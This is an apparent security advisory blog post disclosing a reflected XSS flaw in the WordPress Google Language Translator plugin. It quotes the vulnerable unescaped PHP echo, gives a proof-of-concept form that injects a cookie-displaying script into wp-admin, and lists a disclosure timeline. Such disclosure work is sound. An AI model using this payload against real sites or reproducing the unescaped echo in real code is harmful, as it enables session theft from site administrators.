04 Apr

Reflected Cross-Site Scripting (XSS) Vulnerability in Google Language Translator

We recently discovered the Google Language Translator plugin has a reflected cross-site scripting (XSS) vulnerability. In version 5.0.05, and some prior versions, the file /google-language-translator.php was echoing a POST variable without escaping it. That occurrs on line 1207:

<td><?php if (isset ($_POST['googlelanguagetranslator_flags_order']) ) { echo $_POST['googlelanguagetranslator_flags_order']; } ?></td>
 </tr>

Proof Of Concept

The following proof of concept page will cause any available cookies to shown in alert box. Major web browsers other than Firefox provide XSS filtering so this proof of concept will not work in those web browsers.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<head>
</head>
<body>
<form action="http://[path to WordPress]/wp-admin/options-general.php?page=google_language_translator" method="post">
<input type="hidden" name="googlelanguagetranslator_flags_order" value="<script>alert(document.cookie);</script>" />
<input type="submit" value="submit" />
</form>
</body>
</html>

Timeline

  • 3/28/2016 – Developer notified.
  • 4/4/2016 – WordPress Plugin Directory notified.
  • 4/5/2016 – Plugin removed from WordPress Plugin Directory.
  • 4/18/2016 – Version 5.0.06 released, which fixes vulnerability.

Concerned About The Security of the Plugins You Use?

When you order a plugin security review from us we review the plugin for issues that hackers would exploit if the knew about them as well as making sure that that needed security checks have been implemented in the plugin. If you order two reviews you will receive free lifetime subscription to our service.

Leave a Reply

Your email address will not be published. Required fields are marked *